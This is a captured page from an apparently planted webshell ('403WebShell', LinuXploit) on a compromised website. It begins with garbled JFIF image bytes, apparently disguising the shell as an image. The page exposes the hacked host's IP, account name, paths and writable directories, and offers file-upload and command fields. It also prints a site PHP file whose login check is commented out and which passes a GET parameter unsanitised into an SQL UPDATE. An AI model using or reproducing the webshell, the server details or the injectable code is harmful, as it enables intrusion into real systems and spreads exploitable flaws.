JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 185.124.137.38  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/srt_ket.php
<?php  include "koneksi.php";
  session_start();
	// cek apakah yang mengakses halaman ini sudah login
//	if($_SESSION['status']<>"login"){
	//	header("location:location:../login.php");
	//}
?>


<!-- proses edit data -->
<?php


	//variabel untuk menampung inputan dari form

	$npm 	= $_GET['npm'];
	$tgldaf	= $_GET['tgldaf'];
//	$stataju 	= $_POST['stataju'];
//	$note 	= $_POST['note'];
	//$status2 	= $_POST['status2'];
	
//	$perihal= $_POST['perihal'];
 //   $ahli 	= $_POST['ahli'];
//	$tujuan 	= $_POST['tujuan'];
//	$alamatrek 	= $_POST['alamatrek'];
//	$kota	= $_POST['kota'];
//	$praktek	= $_POST['praktek'];	  
//	$tglreko = date('Y-m-d');	    
	
	// simpan inputan user ke variabel
//	 $userInput = array('norek' => $norek);

	//   if($norek ==''){
	//	echo "Form Belum lengkap ISI No Rekomendasi IDI....";
	//	$nmlead=$userInput['norek'];
		
//	   }else{
	   
	   	//buat barcode


  
//  $day = $_GET ['project'];
//  
//   $dayList = array(
//   'AGUNG DEVELOPMENT'=> 'AGD',
//    'Green Cleosa' => 'CLS',
//    'AGD' => 'AGD',
//    'Allegria' => 'ALG',
//    'Nurasa Regency' => 'NRN',
//    'Okaz' => 'OKZ',
//    'Puri Primacom' => 'PPR',
//    'Sahira Amarta Pemalang' => 'SAP',
//	
//	'Sahira Dharmawangsa' => 'SDR',
//    'Taman Melati Premiere' => 'TMP',
//    'Taman Permata' => 'TPC',
//    'The Pallace Jogjakarta' => 'TPJ'
//	);

  //   $day = 'REK';
//					   $dayList = array(
//						'REK' => 'REK',
//						'AGD' => 'AGD',
//						'Allegria' => 'ALG'
//						);
						
//		 $day = '$perihal';
	$hari = date('Y-m-d');		 
	$perihal='rekomendasi_SIP_dr_umum'	; 
					   $dayList = array(
						'rekomendasi_SIP_dr_umum' => 'STR-DU-',
						'rekomendasi_SIP_dr_spesialis' => 'SIP-SP-',
						'kehilangan' => 'IDI-Bd-'
						);				
				
					
$array_bln = array(1=>"I","II","III", "IV", "V","VI","VII","VIII","IX","X", "XI","XII");
	
$bulan=date('n', strtotime($hari));	
	$bln = $array_bln[$bulan];
//$bln = $array_bln[date('n')];
echo $bln;

					// cari count sudah berapa kali rekom
					//	$query = mysqli_query($konek, "SELECT count(noreg) as jrekom FROM h_registrasi where npm='$npm'  ");
//					$r = mysqli_fetch_array($query);
//					$jrekom=$r['jrekom'];
					
//		$query = mysqli_query($konek, "SELECT count(noreg) as jrekom FROM d_praktek where noreg='$noreg'  ");
//					$r = mysqli_fetch_array($query);
//					$jrekom=$r['jrekom'];
//
//					$query = mysqli_query($konek, "SELECT max(substr(noreko,1,5)) as kodeTerbesar FROM h_registrasi  ");
//					$data = mysqli_fetch_array($query);
//					$kodeBarang = $data['kodeTerbesar'];
//					$urutan = (int) substr($kodeBarang,1,5);
//					$urutan++;
				//	$huruf =  $dayList[$perihal];
	
	
	//urutan ambil dari ID
					
					//$tahun=date('Y');
	 
	               $urutan = substr($npm,-6);
	               $tahun=date('Y', strtotime($hari));
	
					$norek= sprintf("%05s", $urutan)."/IDI CAB KOTA BDG/KTA/".$bln."/".$tahun;
					// $project = $_GET ['project'];
					//$tanggal = '2015-06-03';

 





//		include "qr_code/qrlib.php"; 
//		/*create folder*/
//		$tempdir="temp/";
//		if (!file_exists($tempdir))
//		mkdir($tempdir, 0755);
//	//	$file_name=date("Ymd").rand().".png";	
//		$namafile=date("Ymd").rand().".png";	
//		$file_path = $tempdir.$namafile;
//		
//		QRcode::png($norek, $file_path, "H", 6, 4);
//		/* param (1)qrcontent,(2)filename,(3)errorcorrectionlevel,(4)pixelwidth,(5)margin */
	
	
		

  					               //$update = mysqli_query($konek, "UPDATE d_progres SET data='chek',status2='$status2',keterangan='$keterangan',tgl_cek='$tgl_cek' WHERE id_tagihan='$id'");

							       $update = mysqli_query($konek, "UPDATE h_anggota SET nomor='$norek' WHERE npm='$npm'");
		   
									

		//tanggal Bayar
		//$tglBayar 	= date('Y-m-d');
		header("location:../surat/cetak_keterangan.php?npm=$npm&norek=$norek");
		//echo "$id";
		//if(!$update){
		//	echo "Update data gagal...";
	//	}else{
	//		header("location:cetak_rekom.php?noreg=$noreg&npm=$npm&norek=$norek");
	//	}

//}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit